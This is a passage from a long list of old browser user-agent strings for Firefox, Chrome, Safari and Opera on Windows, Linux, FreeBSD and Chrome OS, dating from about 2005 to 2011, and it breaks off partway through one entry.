-Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.13) Gecko/20101203 AskTbUT2V5/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.13) Gecko/20101203 AskTbVD/3.8.0.12304 Firefox/3.6.13 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.13) Gecko/20101203 AskTbFXTV5/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ro; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU; rv:1.9.2) Gecko/20100105 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; sl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE; rv:1.9.2.13) Gecko/20101203 AskTbIMB/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.1 -Mozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv:1.9.2.13) Gecko/20101203 AskTbCLM/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; uk; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E) -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.14019 Firefox/3.6.13 -Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre -Mozilla/5.0 (Windows; Windows NT 5.1; es-ES; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre -Mozilla/5.0 (X11; CrOS i686 0.13.507) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/13.0.763.0 Safari/534.35 -Mozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.23 (KHTML, like Gecko) Chrome/11.0.686.3 Safari/534.23 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.14 Safari/534.24 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.702.0 Chrome/12.0.702.0 Safari/534.24 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Slackware/Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.35 (KHTML, like Gecko) Ubuntu/10.10 Chromium/13.0.764.0 Chrome/13.0.764.0 Safari/534.35 -Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.23 -Mozilla/5.0 (X11; Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51 -Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.04 Chromium/11.0.696.0 Chrome/11.0.696.0 Safari/534.24 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/13.0.766.0 Safari/534.36 -Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 -Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62 -Mozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.60 -Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4 -Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339 -Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339 Safari/534.10 -Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.341 Safari/534.10 -Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.343 Safari/534.10 -Mozilla/5.0 (X11; U; CrOS i686 0.9.130; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.344 Safari/534.10 -Mozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1) Gecko/20090720 Firefox/3.5.1 -Mozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.0.10) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.1) Gecko/20090703 Firefox/3.5 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9 -Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9a2) Gecko/20080530 Firefox/3.0a2 -Mozilla/5.0 (X11; U; FreeBSD i386; ja-JP; rv:1.9.1.8) Gecko/20100305 Firefox/3.5.8 -Mozilla/5.0 (X11; U; FreeBSD i386; ru-RU; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 -Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 -Mozilla/5.0 (X11; U; Linux armv7l; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i586; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.175.0 Safari/530.7 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.1 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.576.0 Safari/534.12 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b2) Gecko/2007121016 Firefox/3.0b2 -Mozilla/5.0 (X11; U; Linux i686 (x86_64); fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux i686; ca; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; ca; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929 -Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.0.16) Gecko/2009121601 Ubuntu/9.04 (jaunty) Firefox/3.0.16 -Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.1.6) Gecko/20100107 Fedora/3.5.6-1.fc12 Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.11) Gecko/2009062218 Gentoo Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.12) Gecko/2009070812 Ubuntu/8.04 (hardy) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009082505 Red Hat/3.0.14-1.el5_4 Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.18) Gecko/2010020400 SUSE/3.0.18-0.1.1 Firefox/3.0.18 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.18) Gecko/2010021501 Firefox/3.0.18 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009041500 SUSE/3.0.9-2.2 Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.04 (hardy) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Ubuntu/8.04 (hardy) Firefox/3.5 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090722 Gentoo Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091201 SUSE/3.5.6-1.1.1 Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB7.0 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100914 SUSE/3.6.10-0.3.1 Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.10 (karmic) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.11) Gecko/2009060309 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.13) Gecko/2009080316 Ubuntu/8.04 (hardy) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.19) Gecko/2010040118 Ubuntu/8.10 (intrepid) Firefox/3.0.19 GTB7.1 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 GTB6 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 GTB7.1 -Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/531.4 (KHTML, like Gecko) Chrome/3.0.194.0 Safari/531.4 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.1 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.205.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.0 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.2 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.8 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.358.0 Safari/533.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.2 Safari/533.4 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.416.0 Safari/534.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 SUSE/6.0.428.0 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.551.0 Safari/534.10 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0 Safari/534.12 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.44 Safari/534.13 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/9.10 Chromium/9.0.592.0 Chrome/9.0.592.0 Safari/534.13 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.612.1 Safari/534.15 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.611.0 Chrome/10.0.611.0 Safari/534.15 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.457.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.462.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.24 Safari/534.7 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060501 Epiphany/2.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060626 (Debian-1.8.0.5-3) Epiphany/2.14 -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060808 Fedora/1.5.0.6-2.fc5 Firefox/1.5.0.6 pango-text -Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 -Mozilla/5.0 (X11; U; 